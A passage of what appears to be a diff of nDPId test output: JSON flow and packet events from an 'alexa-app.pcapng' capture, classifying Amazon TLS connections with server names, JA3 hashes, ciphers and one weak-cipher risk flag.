-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047050,"flow_last_seen":1490976047050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047050,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1490976047050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047050,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8zEVAAEAGR+WsECrYNu8YuoTyAbvILJz0AAAAAKAC\/\/\/j9wAAAgQFtAQCCAoA9lCxAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1490976047071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047071,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYANAAOcGDTM27xi6rBAq2AG7hPHQ2dGWKLR0gXASH\/53JwAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1490976047073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047073,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJC5AAEAG8BCsECrYNu8YuoTxAbsotHSB0NnRl1AQAVfBmAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047096,"flow_last_seen":1490976047096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047096,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1490976047096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047096,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Q4ZAAEAGA2msECrYNF7ohrJzAbuRhBMzAAAAAKAC\/\/+poAAAAgQFtAQCCAoA9lC1AAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1490976047107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047107,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYitAAOcGCws27xi6rBAq2AG7hPIGkxHQyCyc9XASH\/45RwAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1490976047109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047109,"pkt":"AMDKkaPvePiC0\/vCCABFAAAozEZAAEAGR\/isECrYNu8YuoTyAbvILJz1BpMR0VAQAVeDuAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1490976047154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047154,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwRp1AAOcGWV00XuiGrBAq2AG7snPq5wFokYQTNHASH\/4rBwAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1490976047155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047155,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoQ4dAAEAGA3ysECrYNF7ohrJzAbuRhBM06ucBaVAQAVd1eAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047560,"flow_last_seen":1490976047560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1490976047560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047560,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8csJAAEAG6uOsECrYNFXR2NSbAbtgrSImAAAAAKAC\/\/+\/5AAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047563,"flow_last_seen":1490976047563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047563,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1490976047563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047563,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8y+FAAEAGgVWsECrYSBXOh6SfAbuD+JsFAAAAAKAC\/\/9DRwAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1490976047602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047602,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71JuiSVznYK0iJ6AScSA47wAAAgQFtAQCCAptkKkCAPZQ5AEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1490976047603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976047603,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0csNAAEAG6uqsECrYNFXR2NSbAbtgrSInoklc6IAQAVfXgQAAAQEICgD2UOhtkKkC"} -00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1490976047629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047629,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwJsxAAOcGf3ZIFc6HrBAq2AG7pJ+6tUVgg\/ibBnASH\/6xFgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1490976047631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047631,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoy+JAAEAGgWisECrYSBXOh6SfAbuD+JsGurVFYVAQAVf7hwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047858,"flow_last_seen":1490976047858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047858,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1490976047858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047858,"pkt":"AMDKkaPvePiC0\/vCCABFAAA84nJAAEAGasSsECrYSBXOh6SgAbtFc7NzAAAAAKAC\/\/9pQAAAAgQFtAQCCAoA9lEBAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1490976047907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047907,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwsPFAAOcG9VBIFc6HrBAq2AG7pKCmhnFJRXOzdHASH\/6\/cgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JoxAAEAGJqusECrYSBXOh6SRAbtDcGnhAAAAAKAC\/\/+2eAAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bx1AAEAG3hmsECrYSBXOh6SSAbsCViBwAAAAAKAC\/\/9BAwAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1490976043869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043869,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnhhAAOcGCCpIFc6HrBAq2AG7pJISbmyuAlYgcXASH\/4uVQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1490976043870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043870,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobx5AAEAG3iysECrYSBXOh6SSAbsCViBxEm5sr1AQAVd4xgAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 